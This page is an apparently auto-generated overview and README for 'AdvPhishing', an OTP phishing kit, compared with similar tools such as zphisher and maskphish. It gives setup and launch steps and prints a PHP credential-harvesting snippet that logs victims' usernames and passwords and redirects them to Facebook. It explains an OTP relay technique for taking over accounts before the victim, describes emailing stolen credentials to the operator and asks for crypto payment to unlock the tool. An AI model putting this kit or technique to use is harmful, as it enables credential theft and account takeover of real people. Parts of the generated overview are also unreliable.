Convert Figma logo to code with AI

Ignitetch logoAdvPhishing

This is Advance Phishing Tool ! OTP PHISHING

2,673
743
2,673
121

Top Related Projects

11,081

An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !

Introducing "URL Making Technology" to the world for the very FIRST TIME. Give a Mask to Phishing URL like a PRO.. A MUST have tool for Phishing.

Quick Overview

AdvPhishing is a GitHub repository containing tools for advanced phishing techniques. It provides a collection of scripts and templates designed to create convincing phishing pages and automate various aspects of phishing attacks. This project is intended for educational and research purposes only.

Pros

  • Offers a wide range of pre-built phishing templates for popular websites
  • Includes features for automatic page and link generation
  • Provides tools for handling user input and data collection
  • Supports multiple hosting options for phishing pages

Cons

  • Can be misused for malicious purposes if not used responsibly
  • May require additional setup and configuration for some features
  • Limited documentation and support available
  • Potential legal and ethical concerns surrounding its use

Getting Started

To get started with AdvPhishing:

  1. Clone the repository:

    git clone https://github.com/Ignitetch/AdvPhishing.git
    
  2. Navigate to the project directory:

    cd AdvPhishing
    
  3. Run the setup script:

    ./setup.sh
    
  4. Launch the main script:

    ./AdvPhishing.sh
    
  5. Follow the on-screen prompts to select a phishing template and configure your attack.

Note: This tool should only be used in controlled environments with proper authorization for educational or research purposes. Unauthorized use for malicious purposes is illegal and unethical.

Competitor Comparisons

11,081

An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !

Pros of zphisher

  • More active development with frequent updates
  • Larger community and user base, leading to better support
  • Wider range of phishing templates (30+) compared to AdvPhishing

Cons of zphisher

  • Lacks some advanced features present in AdvPhishing
  • May require more setup steps for certain templates
  • Less focus on customization options for phishing pages

Code Comparison

AdvPhishing (setup.sh):

apt-get -y install apache2
apt-get -y install php
apt-get -y install jq
apt-get -y install tail
apt-get -y install curl

zphisher (setup.sh):

apt-get update
apt-get upgrade -y
apt-get install apache2 -y
apt-get install php -y
apt-get install jq -y
apt-get install curl -y

Both projects use similar setup scripts to install required dependencies. zphisher includes an update and upgrade step, which may lead to a more up-to-date system. However, the core installations are nearly identical, focusing on Apache, PHP, jq, and curl.

It's important to note that these tools are intended for educational and authorized testing purposes only. Misuse of such tools for malicious activities is illegal and unethical.

Introducing "URL Making Technology" to the world for the very FIRST TIME. Give a Mask to Phishing URL like a PRO.. A MUST have tool for Phishing.

Pros of maskphish

  • Simpler and more straightforward to use
  • Focuses specifically on URL masking
  • Lighter weight with fewer dependencies

Cons of maskphish

  • Less comprehensive feature set
  • Limited to URL masking, lacking advanced phishing capabilities
  • May require additional tools for a complete phishing setup

Code Comparison

maskphish:

url_checker() {
    if [ ! "${1//:*}" = http ]; then
        if [ ! "${1//:*}" = https ]; then
            echo -e "\e[31m[!] Invalid URL. Please use http or https.\e[0m"
            exit 1
        fi
    fi
}

AdvPhishing:

<?php
file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://facebook.com/');
exit();
?>

The maskphish code focuses on URL validation, while AdvPhishing includes server-side logic for handling phishing data. AdvPhishing offers more comprehensive phishing capabilities, but maskphish provides a simpler approach focused on URL manipulation.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Note: If you want to activate this tool or want same project with working condition then first pay: ETH(ERC20) wallet address:

0xe48df3c0e1713518096c7d2d0a2dce70aa85cd33

Follow on Social Media Platforms

Contribute us

Want to Learn to Create Professional Phishing Page, Ethical Hacking, Bug Bounty visit - https://secnhack.in





Join Our Whastapp Group For Any Queries and Learn Hacking

Telegrams

Signal Group

TECHNIQUE

When victim enter his credentials, you need to go to original website and use those credentials to send real OTP to victim. Once he enter that OTP such OTP will also be there with you and you will be allowed to login the account before him.

TUTORIAL [ KALI ]

(des

SCREENSHOT ( KALI )

1 2




WHAT's New In AdvPhishing 2.2 Release

Through This Features You can Obtains the Credentails on Your Gmail Account or Send to Someone Else.

Process

  • Sender : Open config.php File Through nano or your favorite tool and enter name, your email id, your password.
  • Receiver : Which you want to send the Credentials.

3 4

  • Open your emial ID that you mentioned in sende, go security options, scroll down and trun on less secure setting. That's IT :) !! 5

Results You Can See Here :) !!

1 2


INSTALLATION [ TERMUX APP --ANDROID ]

INSTALLATION [ KALI ]

AVAILABLE TUNNELLING OPTIONS

  1. LOCALHOST
  2. NGROK (https://ngrok.com/)

TESTED ON FOLLOWING:-

  • Kali Linux - 2020.1a (version)
  • Parrot OS - Rolling Edition (version)
  • Ubuntu - 18.04 (version)
  • Arch Linux
  • Termux App

PREREQUISITES

  • sudo - [ MUST ]
  • php
  • apache2
  • ngrok Token

LANGUAGE

  • Bash Script

Contact For Contribute & Issues

                                  EMAIL FOR ISSUES AND CONTRIBUTE : sg5479845@gmail.com

DISCLAIMER

                                   TO BE USED FOR EDUCATIONAL PURPOSES ONLY

The use of the Adv-Phishing is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.